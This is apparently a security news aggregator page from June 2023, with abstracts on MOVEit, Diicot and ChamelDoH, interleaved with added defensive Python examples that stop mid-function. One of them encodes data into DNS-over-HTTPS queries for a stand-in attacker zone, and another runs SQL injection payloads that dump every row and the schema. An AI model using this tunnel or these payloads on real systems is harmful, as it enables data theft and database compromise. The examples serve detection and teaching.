Abstract Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems. "As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu  said  in a preliminary report published on Friday. The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023. Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed  JokerSpy . The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for execut

The Hacker News

June 19, 2023 – Government

EU member states are urged to restrict without delay 5G equipment from risky suppliers Full Text

Abstract The European Commission urges member states to limit “without delay” equipment from Chinese suppliers from their 5G networks, specifically Huawei and ZTE. The European Commission told member states to impose restrictions on high-risk suppliers...

Security Affairs

June 19, 2023 – Government

Britain to double cyber defense funding for Ukraine Full Text

Abstract The United Kingdom on Sunday announced a “major expansion” to its Ukraine Cyber Program, which has seen British experts provide remote incident response support to the Ukrainian government following Russian cyberattacks on critical infrastructure.

Cyware

June 19, 2023 – Solution

Introducing AI-guided Remediation for IaC Security / KICS Full Text

Abstract While the use of Infrastructure as Code (IaC) has gained significant popularity as organizations embrace cloud computing and DevOps practices, the speed and flexibility that IaC provides can also introduce the potential for misconfigurations and security vulnerabilities. IaC allows organizations to define and manage their infrastructure using machine-readable configuration files, which are typically version-controlled and treated as code. IaC misconfigurations are mistakes, or oversights, in the configuration of infrastructure resources and environments that happen when using IaC tools and frameworks. Misconfigurations in IaC ca

The Hacker News
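
As an added example of the kind of IaC check the entry above describes (this is not the page's, KICS's or Checkmarx's code), the block below is a minimal misconfiguration scanner over Terraform JSON syntax (.tf.json), run on a constructed weak configuration and on the same resources corrected. The resource types and attribute names are the documented AWS provider ones; the three rules, the admin-port list and the sample values are this example's own choices.

```python
"""Added example (not the page's or Checkmarx's code): a minimal IaC
misconfiguration checker over Terraform JSON syntax (.tf.json), with a weak
configuration beside the corrected one. Resource attributes are the documented
AWS provider ones; the rules and sample values are this example's choice."""
import json

# Constructed weak configuration: public bucket ACL, SSH open to the world,
# and a database that is both internet-reachable and unencrypted.
WEAK_TF_JSON = """
{"resource": {
  "aws_s3_bucket": {"logs": {"bucket": "example-logs", "acl": "public-read"}},
  "aws_security_group": {"admin": {"name": "admin",
    "ingress": [{"from_port": 22, "to_port": 22, "protocol": "tcp",
                 "cidr_blocks": ["0.0.0.0/0"]}]}},
  "aws_db_instance": {"app": {"engine": "postgres",
    "publicly_accessible": true, "storage_encrypted": false}}
}}
"""

# The same resources with each finding corrected.
HARDENED_TF_JSON = """
{"resource": {
  "aws_s3_bucket": {"logs": {"bucket": "example-logs", "acl": "private"}},
  "aws_security_group": {"admin": {"name": "admin",
    "ingress": [{"from_port": 22, "to_port": 22, "protocol": "tcp",
                 "cidr_blocks": ["10.0.0.0/8"]}]}},
  "aws_db_instance": {"app": {"engine": "postgres",
    "publicly_accessible": false, "storage_encrypted": true}}
}}
"""

RULES = []              # (resource_type, rule function) pairs, registered below
ADMIN_PORTS = (22, 3389)  # SSH and RDP: never open to the whole internet

def rule(resource_type):
    def register(fn):
        RULES.append((resource_type, fn))
        return fn
    return register

@rule("aws_s3_bucket")
def s3_public_acl(name, attrs):
    if attrs.get("acl") in ("public-read", "public-read-write"):
        yield f"aws_s3_bucket.{name}: acl '{attrs['acl']}' grants anonymous access"

@rule("aws_security_group")
def sg_admin_ports_open_to_world(name, attrs):
    for ing in attrs.get("ingress", []):
        lo, hi = int(ing.get("from_port", 0)), int(ing.get("to_port", 0))
        # protocol "-1" or port range 0-0 means every port
        all_ports = str(ing.get("protocol")) == "-1" or (lo, hi) == (0, 0)
        exposed = all_ports or any(lo <= p <= hi for p in ADMIN_PORTS)
        if "0.0.0.0/0" in ing.get("cidr_blocks", []) and exposed:
            yield f"aws_security_group.{name}: ingress {lo}-{hi} open to 0.0.0.0/0"

@rule("aws_db_instance")
def db_exposure(name, attrs):
    if attrs.get("publicly_accessible") is True:
        yield f"aws_db_instance.{name}: publicly_accessible = true"
    if attrs.get("storage_encrypted") is not True:   # provider default is false
        yield f"aws_db_instance.{name}: storage_encrypted is not true"

def check_tf_json(text):
    """Run every registered rule over each resource block; return finding strings."""
    resources = json.loads(text).get("resource", {})
    findings = []
    for rtype, fn in RULES:
        for name, body in resources.get(rtype, {}).items():
            # tf.json allows a list of blocks under one resource name
            for attrs in (body if isinstance(body, list) else [body]):
                findings.extend(fn(name, attrs))
    return findings

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_TF_JSON), ("hardened", HARDENED_TF_JSON)):
        print(label, check_tf_json(cfg) or "no findings")
```

Registering rules per resource type keeps each check small and testable on its own, which is what makes a scanner like this cheap to run in a pre-commit hook or CI step before the plan is applied.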

June 19, 2023 – Criminals

Diicot cybercrime gang expands its attack capabilities Full Text

Abstract Researchers found evidence that Diicot threat actors are expanding their capabilities with new payloads and the Cayosin Botnet. Cado researchers recently detected an interesting attack pattern linked to an emerging cybercrime group tracked as Diicot...

Security Affairs

June 19, 2023 – Vulnerabilities

Third Bug in MOVEit Transfer Found Full Text

Abstract Progress Software has reported a third vulnerability in its MOVEit Transfer application. The bug, which still awaits a CVE identifier, is an SQL injection vulnerability. The company strongly advised customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443. This precaut...

Cyware

June 19, 2023 – Hacker

State-Backed Hackers Employ Advanced Methods to Target Middle Eastern and African Governments Full Text

Abstract Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques. "The main goal of the attacks was to obtain highly confidential and sensitive information, specifically related to politicians, military activities, and ministries of foreign affairs," Lior Rochberger, senior threat researcher at Palo Alto Networks, said in a technical deep dive published last week. The company's Cortex Threat Research team is tracking the activity under the temporary name CL-STA-0043 (where CL stands for cluster and STA stands for state-backed motivation), describing it as a "true advanced persistent threat." The infection chain is triggered by the exploitation of vulnerable on-premises Internet Information Services (IIS) and Microsoft Exchange servers to infiltrate target networks. Palo Alto Networks said it dete

The Hacker News

June 19, 2023 – Business

Content Moderation Tech Startup Trust Lab Snags $15M Investment Full Text

Abstract The Palo Alto company said the $15 million Series A was led by U.S. Venture Partners (USVP) and Foundation Capital, two prominent investment firms betting on cybersecurity startups.

Cyware

June 19, 2023 – Denial Of Service

Microsoft Blames Massive DDoS Attack for Azure, Outlook, and OneDrive Disruptions Full Text

Abstract Microsoft on Friday attributed a string of service outages aimed at Azure, Outlook, and OneDrive earlier this month to an uncategorized cluster it tracks under the name  Storm-1359 . "These attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools," the tech giant  said  in a post on Friday. Storm-#### (previously DEV-####) is a temporary designation the Windows maker assigns to unknown, emerging, or developing groups whose identity or affiliation hasn't been definitively established yet. While there is no evidence that any customer data was accessed or compromised, the company noted the attacks "temporarily impacted availability" of some services. Redmond said it further observed the threat actor launching  layer 7 DDoS attacks  from multiple cloud services and open proxy infrastructures. This includes HTTP(S) flood attacks, which bombard the target services with a

The Hacker News
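
Two of the patterns on this page, the SSH dictionary attacks behind the Tsunami and Diicot campaigns and the layer 7 HTTP(S) floods Microsoft attributes to Storm-1359, share one detection primitive: counting events per source inside a sliding time window. The block below is an added example (not code from the page or from any of the cited reports) that implements that primitive once and applies it to constructed sshd and web-server log lines. The IPs are documentation ranges, the year for the syslog lines is assumed to be 2023, and the thresholds are deliberately tiny so the sample triggers.

```python
"""Added example (not from the page or the cited reports): one sliding-window
threshold detector applied to two patterns described above, SSH dictionary
attacks against Linux hosts and layer 7 HTTP(S) floods.
All log lines are constructed; IPs are documentation ranges."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd lines in syslog format (no year; 2023 is assumed below).
SSH_LOG = """\
Jun 20 03:14:01 web1 sshd[2231]: Failed password for root from 203.0.113.7 port 41022 ssh2
Jun 20 03:14:02 web1 sshd[2231]: Failed password for root from 203.0.113.7 port 41023 ssh2
Jun 20 03:14:02 web1 sshd[2235]: Failed password for invalid user admin from 203.0.113.7 port 41024 ssh2
Jun 20 03:14:03 web1 sshd[2240]: Failed password for invalid user oracle from 203.0.113.7 port 41025 ssh2
Jun 20 03:14:05 web1 sshd[2244]: Failed password for root from 203.0.113.7 port 41026 ssh2
Jun 20 03:14:09 web1 sshd[2250]: Accepted password for root from 203.0.113.7 port 41027 ssh2
Jun 20 03:20:11 web1 sshd[2300]: Failed password for alice from 198.51.100.4 port 50000 ssh2
Jun 20 03:25:40 web1 sshd[2310]: Accepted publickey for alice from 198.51.100.4 port 50001 ssh2
"""

# Constructed web server access log lines (Common Log Format).
HTTP_LOG = """\
203.0.113.9 - - [20/Jun/2023:03:14:00 +0000] "GET /login HTTP/1.1" 200 512
203.0.113.9 - - [20/Jun/2023:03:14:00 +0000] "GET /login HTTP/1.1" 200 512
203.0.113.9 - - [20/Jun/2023:03:14:01 +0000] "GET /login HTTP/1.1" 200 512
198.51.100.4 - - [20/Jun/2023:03:14:01 +0000] "GET / HTTP/1.1" 200 1024
203.0.113.9 - - [20/Jun/2023:03:14:01 +0000] "GET /login HTTP/1.1" 200 512
203.0.113.9 - - [20/Jun/2023:03:14:02 +0000] "GET /login HTTP/1.1" 200 512
203.0.113.9 - - [20/Jun/2023:03:14:02 +0000] "GET /login HTTP/1.1" 200 512
198.51.100.4 - - [20/Jun/2023:03:15:30 +0000] "GET /css/site.css HTTP/1.1" 200 2048
"""

SSH_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+)")
HTTP_RE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')


def sliding_window_alerts(events, window_seconds, threshold):
    """events: (timestamp, key) pairs. Returns {key: time at which `threshold`
    events from that key first fell inside one window_seconds window}."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, key in sorted(events):
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:   # drop expired events
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


def detect_ssh_bruteforce(log_text, window_seconds=60, threshold=5, year=2023):
    """Returns (brute-force alerts by source IP, IPs that then logged in successfully)."""
    failures, successes = [], []
    for line in log_text.splitlines():
        m = SSH_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        (failures if m["result"] == "Failed" else successes).append((ts, m["ip"]))
    alerts = sliding_window_alerts(failures, window_seconds, threshold)
    # A success from a source that was already alerting is the signal to escalate:
    # the dictionary attack worked and the host is likely carrying a payload now.
    compromised = {ip for ts, ip in successes if ip in alerts and ts >= alerts[ip]}
    return alerts, compromised


def detect_http_flood(log_text, window_seconds=5, threshold=6):
    """Per-source request rate. Thresholds are tiny so the sample triggers;
    production values depend on the service's normal per-client rate."""
    events = []
    for line in log_text.splitlines():
        m = HTTP_RE.match(line)
        if m:
            events.append((datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]))
    return sliding_window_alerts(events, window_seconds, threshold)


if __name__ == "__main__":
    alerts, compromised = detect_ssh_bruteforce(SSH_LOG)
    print("ssh brute force:", alerts, "followed by success:", compromised)
    print("http flood:", detect_http_flood(HTTP_LOG))
```

The per-source counter catches a single noisy host; the floods described above come from many VPS and open-proxy sources at once, so the same window logic should also be run over the aggregate request rate and over per-path counts, where a distributed flood still shows up even when each source stays under the per-IP threshold.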

June 18, 2023 – Outage

Microsoft: June Outlook and cloud platform outages were caused by DDoS Full Text

Abstract Microsoft confirmed that the recent outages to the Azure, Outlook, and OneDrive services were caused by cyber attacks. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing apps,...

Security Affairs

June 18, 2023 – Criminals

Reddit Files: BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from Reddit Full Text

Abstract The BlackCat/ALPHV ransomware gang claims to have stolen 80GB of data from the Reddit in February cyberattack. In February, the social news aggregation platform Reddit suffered a security breach, attackers gained unauthorized access to internal documents,...

Security Affairs

June 18, 2023 – Government

US govt offers $10 million bounty for info linking Clop ransomware gang to a foreign government. Full Text

Abstract The U.S. government announced up to a $10 million bounty for information linking the Clop ransomware gang to a foreign government. The US government is offering up to a $10 million bounty for information linking CL0P Ransomware Gang or any other threat...

Security Affairs

June 18, 2023 – General

Security Affairs newsletter Round 424 by Pierluigi Paganini – International edition Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Law...

Security Affairs

June 17, 2023 – Criminals

Law enforcement shutdown a long-standing DDoS-for-hire service Full Text

Abstract Polish police, as part of the international law enforcement operation PowerOFF, dismantled a DDoS-for-hire service that has been active since at least 2013. An international operation codenamed PowerOFF led to the shutdown of a DDoS-for-hire service...

Security Affairs

June 17, 2023 – Vulnerabilities

A simple bug exposed access to thousands of smart security alarm systems Full Text

Abstract U.S. power and electronics giant Eaton has fixed a security vulnerability that allowed a security researcher to remotely access thousands of smart security alarm systems.

Cyware

June 17, 2023 – Botnet

From Cryptojacking to DDoS Attacks: Diicot Expands Tactics with Cayosin Botnet Full Text

Abstract Cybersecurity researchers have discovered previously undocumented payloads associated with a Romanian threat actor named  Diicot , revealing its potential for launching distributed denial-of-service (DDoS) attacks. "The Diicot name is significant, as it's also the name of the  Romanian organized crime and anti-terrorism policing unit ," Cado Security  said  in a technical report. "In addition, artifacts from the group's campaigns contain messaging and imagery related to this organization." Diicot (née Mexals) was  first documented  by Bitdefender in July 2021, uncovering the actor's use of a Go-based SSH brute-forcer tool called Diicot Brute to breach Linux hosts as part of a cryptojacking campaign. Then earlier this April, Akamai  disclosed  what it described as a "resurgence" of the 2021 activity that's believed to have started around October 2022, netting the actor about $10,000 in illicit profits. "The attackers use a long ch

The Hacker News

June 17, 2023 – Vulnerabilities

Third MOVEit bug fixed a day after PoC exploit made public Full Text

Abstract Details of the latest vulnerability, tracked as CVE-2023-35708, were made public on Thursday, and a proof-of-concept (PoC) exploit for the flaw emerged the same day. Progress Software issued a fix for it on Friday.

Cyware

June 16, 2023 – Policy and Law

Justice Department Charges Russian National for LockBit Ransomware Attacks Full Text

Abstract The 20-year-old allegedly participated in a conspiracy to commit wire fraud and intentionally damage protected computers and make ransom demands.

Lawfare

June 16, 2023 – Criminals

A Russian national charged for committing LockBit Ransomware attacks Full Text

Abstract DoJ charged a Russian national with conspiring to carry out LockBit ransomware attacks against U.S. and foreign businesses. The Justice Department announced charges against the Russian national Ruslan Magomedovich Astamirov (20) for his role in numerous...

Security Affairs

June 16, 2023 – Malware

ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC Full Text

Abstract The threat actor known as ChamelGang has been observed using a previously undocumented implant to backdoor Linux systems, marking a new expansion of the threat actor's capabilities. The malware, dubbed ChamelDoH by Stairwell, is a C++-based tool for communicating via DNS-over-HTTPS (DoH) tunneling. ChamelGang was first outed by Russian cybersecurity firm Positive Technologies in September 2021, detailing its attacks on fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan. Attack chains mounted by the actor have leveraged vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application Platform to gain initial access and carry out data theft attacks using a passive backdoor called DoorMe. "This is a native IIS module that is registered as a filter through which HTTP requests and responses are processed," Positive Technologies said at the time. "Its principle of operation is unusual: the back

The Hacker News
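
The entry above says ChamelDoH talks to its operators through DNS-over-HTTPS tunneling but not how such a tunnel carries data. The block below is an added example (not the page's or Stairwell's code, and not ChamelDoH's own encoding, which the page does not describe) showing the generic mechanism: payload bytes are base32-encoded into query-name labels under an attacker-controlled zone and sent as RFC 8484 GET requests, and a resolver- or proxy-side heuristic flags zones that receive many long, high-entropy subdomains. The zone c2.example.net, the payload and the benign names are constructed; the "last two labels" apex rule and the thresholds are this example's simplifications.

```python
"""Added example (not the page's or Stairwell's code, and not ChamelDoH's own
encoding): how a DNS-over-HTTPS tunnel carries data in query names, and a
detection heuristic over observed names. Zone c2.example.net and the payload
are constructed."""
import base64
import hashlib
import math
import struct
from collections import Counter, defaultdict

TUNNEL_ZONE = "c2.example.net"   # assumed attacker-controlled zone

def constructed_payload(n=512, seed=b"constructed sample"):
    """Deterministic pseudo-random bytes standing in for an exfiltrated file."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]

def tunnel_names(payload, zone):
    """Client side: base32 (DNS-safe) chunks of at most 63 chars, one per query,
    with a sequence-number label so the receiver can reorder them."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    return [f"{i}.{b32[j:j + 63]}.{zone}" for i, j in enumerate(range(0, len(b32), 63))]

def reassemble(names):
    """Server side: take the sequence and data labels, order, re-pad, decode."""
    parts = {}
    for n in names:
        seq, data = n.split(".")[:2]
        parts[int(seq)] = data
    b32 = "".join(parts[k] for k in sorted(parts))
    return base64.b32decode(b32 + "=" * (-len(b32) % 8), casefold=True)

def doh_get_path(qname, qtype=16):
    """RFC 8484 GET form: a wire-format DNS query (ID 0, RD set, QTYPE TXT by
    default), base64url without padding, in the dns= parameter."""
    header = struct.pack("!HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    question = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    msg = header + question + struct.pack("!HH", qtype, 1)   # class IN
    return "/dns-query?dns=" + base64.urlsafe_b64encode(msg).decode().rstrip("=")

# ---- detection side: run over query names seen at a DoH proxy or resolver ----

def shannon_entropy(s):
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0

def registered_zone(name):
    # Assumption: the apex is the last two labels (a real deployment would
    # consult the public suffix list instead).
    return ".".join(name.split(".")[-2:])

def flag_tunnel_zones(names, min_queries=10, min_avg_len=30, min_avg_entropy=3.5):
    """Zones with many distinct, long, high-entropy subdomains look like tunnels."""
    subs_by_zone = defaultdict(set)
    for n in names:
        zone = registered_zone(n)
        subs_by_zone[zone].add(n[:-len(zone) - 1] if n.endswith("." + zone) else "")
    flagged = {}
    for zone, subs in subs_by_zone.items():
        if len(subs) < min_queries:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg_len >= min_avg_len and avg_ent >= min_avg_entropy:
            flagged[zone] = {"queries": len(subs), "avg_len": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2)}
    return flagged

# Constructed benign traffic: many hosts under one zone, but short, low-entropy names.
BENIGN_NAMES = [f"{h}.example.org" for h in (
    "www", "mail", "api", "cdn", "login", "static", "img", "docs", "blog", "shop", "sso", "vpn")]

if __name__ == "__main__":
    names = tunnel_names(constructed_payload(), TUNNEL_ZONE)
    print(len(names), "queries, e.g.", doh_get_path(names[0])[:80], "...")
    print("round trip ok:", reassemble(names) == constructed_payload())
    print("flagged:", flag_tunnel_zones(names + BENIGN_NAMES))
```

The detection point is that DoH hides the queries from a passive network sensor, so the names have to be collected where they are visible: at an enterprise DoH resolver, at a proxy that terminates the TLS session, or from endpoint telemetry. Blocking direct access to public DoH resolvers so that traffic passes through such a point is the precondition for this heuristic to see anything.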

June 16, 2023 – Attack

Oil and gas giant Shell is another victim of Clop ransomware attacks Full Text

Abstract British multinational oil and gas company Shell has confirmed that it has suffered a ransomware attack conducted by the Clop group. Oil and Gas giant Shell has confirmed that it is one of the victims of the recent large-scale ransomware campaign...

Security Affairs

June 16, 2023 – Malware

Balada Injector Campaign Hacks WordPress Sites Using Unpatched Plugins Full Text

Abstract Balada leverages functions written in the Go language to spread itself and maintain persistence by executing a series of attacks, cross-site infections, and installation of backdoors.

Cyware

June 16, 2023 – Education

Activities in the Cybercrime Underground Require a New Approach to Cybersecurity Full Text

Abstract As Threat Actors Continuously Adapt their TTPs in Today's Threat Landscape, So Must You. Earlier this year, threat researchers at Cybersixgill released the annual report, The State of the Cybercrime Underground. The research stems from an analysis of Cybersixgill's collected intelligence items throughout 2022, gathered from the deep, dark and clear web. The report examines the continuous evolution of threat actors' tactics, tools, and procedures (TTPs) in the Digital Age – and how organizations can adapt to reduce risk and maintain business resilience. This article summarizes a few of the report's findings, including trends in credit card fraud, observations about cryptocurrency, AI developments and how they're lowering barriers to entry to cybercrime, and the rise of cybercriminal "as-a-service" activities. Further below, I also discuss the need for a new security approach, combining attack surface management (ASM) and cyber threat intelligence (CTI) to

The Hacker News

June 16, 2023 – Vulnerabilities

Progress fixed a third flaw in MOVEit Transfer software Full Text

Abstract Progress Software addressed a third vulnerability impacting its MOVEit Transfer application that could lead to privilege escalation and information disclosure. Progress Software disclosed a new SQL injection vulnerability impacting its MOVEit Transfer...

Security Affairs

June 16, 2023 – Breach

Two Energy Department Entities Breached as Part of Massive MOVEit Transfer Compromise Full Text

Abstract Multiple federal agencies, including two Department of Energy entities, were victims of a cyberattack that resulted from a widespread vulnerability in MOVEit file transfer software, federal officials said Thursday.

Cyware

June 16, 2023 – Criminals

20-Year-Old Russian LockBit Ransomware Affiliate Arrested in Arizona Full Text

Abstract The U.S. Department of Justice (DoJ) on Thursday unveiled charges against a Russian national for his alleged involvement in deploying LockBit ransomware to targets in the U.S., Asia, Europe, and Africa. Ruslan Magomedovich Astamirov, 20, of Chechen Republic has been accused of perpetrating at least five attacks between August 2020 and March 2023. He was arrested in the state of Arizona last month. "Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware," the DoJ  said . Astamirov, as part of his LockBit-related activities, managed various email addresses, IP addresses, and other online accounts to deploy the ransomware and communicate with the victims. Law enforcement agencies said they were able to trace a chunk of an unnamed victim's ransom payment to a virtual currency address operated by Astam

The Hacker News

June 16, 2023 – Malware

Updated Android spyware GravityRAT steals WhatsApp Backups Full Text

Abstract An updated version of the Android remote access trojan GravityRAT can steal WhatsApp backup files and can delete files. ESET researchers discovered an updated version of the Android GravityRAT spyware that steals WhatsApp backup files and can delete files....

Security Affairs

June 16, 2023 – Hacker

New Diicot Threat Group Targets SSH Servers with Brute-Force Malware Full Text

Abstract Deploying the Cayosin botnet, an off-the-shelf Mirai-based botnet agent, to target routers running the Linux-based OpenWrt OS is a newly adopted tactic, indicating that the group changes its attack style after examining its targets.

Cyware

June 16, 2023 – Vulnerabilities

Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack Full Text

Abstract Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies. The new flaw, which is being tracked as CVE-2023-35708, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment." The company is urging its customers to disable all HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a fix is being prepared to address the weakness. The cloud managed file transfer solution has been fully patched. The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities (CVE-2023-35036) that it said could be weaponized to access the application's database content. The vulnerabilities join CVE-2023-34362, which was exploited as a zero-day by the Clop ransomware gang in data theft attacks

The Hacker News
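
The MOVEit entries above (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) all describe SQL injection leading to database access and privilege escalation without showing the pattern itself. The block below is an added example, not MOVEit code (Progress has not published the flawed query), that puts the vulnerable string-built query beside its parameterized fix on a constructed in-memory SQLite table, and runs two classic payloads against both: a tautology that returns every row including the admin, and a UNION that reads schema metadata, the usual first step toward dumping database contents.

```python
"""Added example (not MOVEit code; Progress has not published the flawed
query): the SQL injection pattern beside its parameterized fix, on an
in-memory SQLite table constructed for the demo."""
import sqlite3

def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, role TEXT);
        INSERT INTO users(username, role) VALUES ('alice', 'user'), ('bob', 'admin');
    """)
    return conn

def lookup_vulnerable(conn, username):
    # Attacker-controlled text is spliced into SQL syntax: quotes, OR, UNION
    # and comment markers all change the statement the engine parses.
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, username):
    # The value travels as a bound parameter and is never parsed as SQL,
    # so the same input matches nothing instead of rewriting the query.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()

# Two classic payloads: a tautology that returns every row (incl. the admin),
# and a UNION that reads schema metadata from sqlite_master.
TAUTOLOGY = "x' OR '1'='1"
UNION_SCHEMA = "x' UNION SELECT name, sql FROM sqlite_master--"

def demo():
    """Runs both payloads through both implementations; returns the rows each yields."""
    conn = setup_db()
    return {
        "vuln_tautology": lookup_vulnerable(conn, TAUTOLOGY),
        "vuln_union": lookup_vulnerable(conn, UNION_SCHEMA),
        "safe_tautology": lookup_parameterized(conn, TAUTOLOGY),
        "safe_union": lookup_parameterized(conn, UNION_SCHEMA),
        "safe_normal": lookup_parameterized(conn, "bob"),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:15s} {v}")
```

The trailing `--` in the UNION payload comments out the closing quote the application appends, which is why escaping quotes alone is not a fix: only binding the value as a parameter (or an equivalent prepared statement in the application's database driver) keeps data and code apart.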

June 15, 2023 – Malware

SeroXen Incorporates Latest BatCloak Engine Iteration Full Text

Abstract SeroXen malware uses advanced, fully undetectable (FUD) techniques to infect victims with hVNC-capable malware. The malware uses highly obfuscated batch files as the loading mechanism, utilizing the BatCloak obfuscation engine.

Cyware

June 15, 2023 – Cryptocurrency

Ransomware Hackers and Scammers Utilizing Cloud Mining to Launder Cryptocurrency Full Text

Abstract Ransomware actors and cryptocurrency scammers have joined nation-state actors in abusing cloud mining services to launder digital assets, new findings reveal. "Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis  said  in a report shared with The Hacker News. Earlier this March, Google Mandiant  disclosed  North Korea-based APT43's use of the hash rental and cloud mining services to obscure the forensic trail and wash the stolen cryptocurrency "clean." Cloud mining services  allow users to rent a computer system and use that computer's hash power to mine cryptocurrencies without having to manage the mining hardware themselves. But according to Chainalysis, it's not just nation-state hacking crews who are leveraging such services in the wild. In one example highlighted by

The Hacker News

June 15, 2023 – Government

The Dynamics of the Ukrainian IT Army’s Campaign in Russia Full Text

Abstract The Ukrainian IT Army offers a unique perspective into the choices of an offensive actor in a war.

Lawfare

June 15, 2023 – Government

Proposed NIST Updates and Data Incident Response Planning Full Text

Abstract Proposals to update NIST 800-171, the U.S. government's primary information security standard for the private sector, coincide with an escalation of cyberattacks against U.S. businesses.

Lawfare

June 15, 2023 – Attack

Barracuda ESG zero-day exploited by China-linked APT Full Text

Abstract Experts linked the UNC4841 threat actor behind the attacks exploiting the recently patched Barracuda ESG zero-day to China. Mandiant researchers linked the threat actor UNC4841 behind the attacks that exploited the recently patched Barracuda ESG zero-day...

Security Affairs

June 15, 2023 – Phishing

North Korea created evil twin of South Korea’s Naver.com Full Text

Abstract North Korea has created a fake version of South Korea's largest internet portal, Naver, in a large-scale phishing attempt, Seoul's National Intelligence Service (NIS) said on Wednesday.

Cyware

June 15, 2023 – APT

Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway Full Text

Abstract A suspected China-nexus threat actor dubbed UNC4841 has been linked to the exploitation of a recently patched zero-day flaw in Barracuda Email Security Gateway (ESG) appliances since October 2022. "UNC4841 is an espionage actor behind this wide-ranging campaign in support of the People's Republic of China," Google-owned Mandiant said in a new report published today, describing the group as "aggressive and skilled." The flaw in question is CVE-2023-2868 (CVSS score: 9.8), which relates to a remote command injection affecting versions 5.1.3.001 through 9.2.0.006 that arises as a result of an incomplete validation of attachments contained within incoming emails. Barracuda addressed the problem on May 20 and 21, 2023, but the company has since urged affected customers to immediately replace the devices "regardless of patch version level." Now according to the incident response and threat intelligence firm, which was appointed to probe the hack, UNC4

The Hacker News
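
Two entries on this page turn on OS command injection: the Zyxel NAS flaw CVE-2023-27992, where a crafted HTTP request reaches an OS command, and the Barracuda ESG flaw CVE-2023-2868, where incompletely validated email attachments do. Neither vendor's code path is described on the page, so the block below is an added, generic example (not Zyxel's or Barracuda's code) using an attachment file name as the untrusted input: the vulnerable form interpolates it into a shell command line, the hardened form allowlists the name, confines the resolved path and runs the tool with an argument vector and no shell. It assumes a Unix-like host with wc(1) and builds its attachment directory in a constructed temp dir.

```python
"""Added example (generic; neither Zyxel's nor Barracuda's code, whose flawed
paths are not described on this page): an OS command injection beside its
hardened form, using attachment file names as the untrusted input. Assumes a
Unix-like host with wc(1); the attachment directory is a constructed temp dir."""
import os
import re
import subprocess
import tempfile

def attachment_size_vulnerable(directory, filename):
    # Untrusted name interpolated into a shell command line: ';', '|', '$()',
    # backticks and newlines inside the name become additional commands.
    cmd = f"wc -c {os.path.join(directory, filename)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Allowlist: alphanumerics plus . _ - ; no leading dot (blocks '..' and dotfiles).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")

def attachment_size_hardened(directory, filename):
    # 1) Reject anything outside the allowlist before it touches a path.
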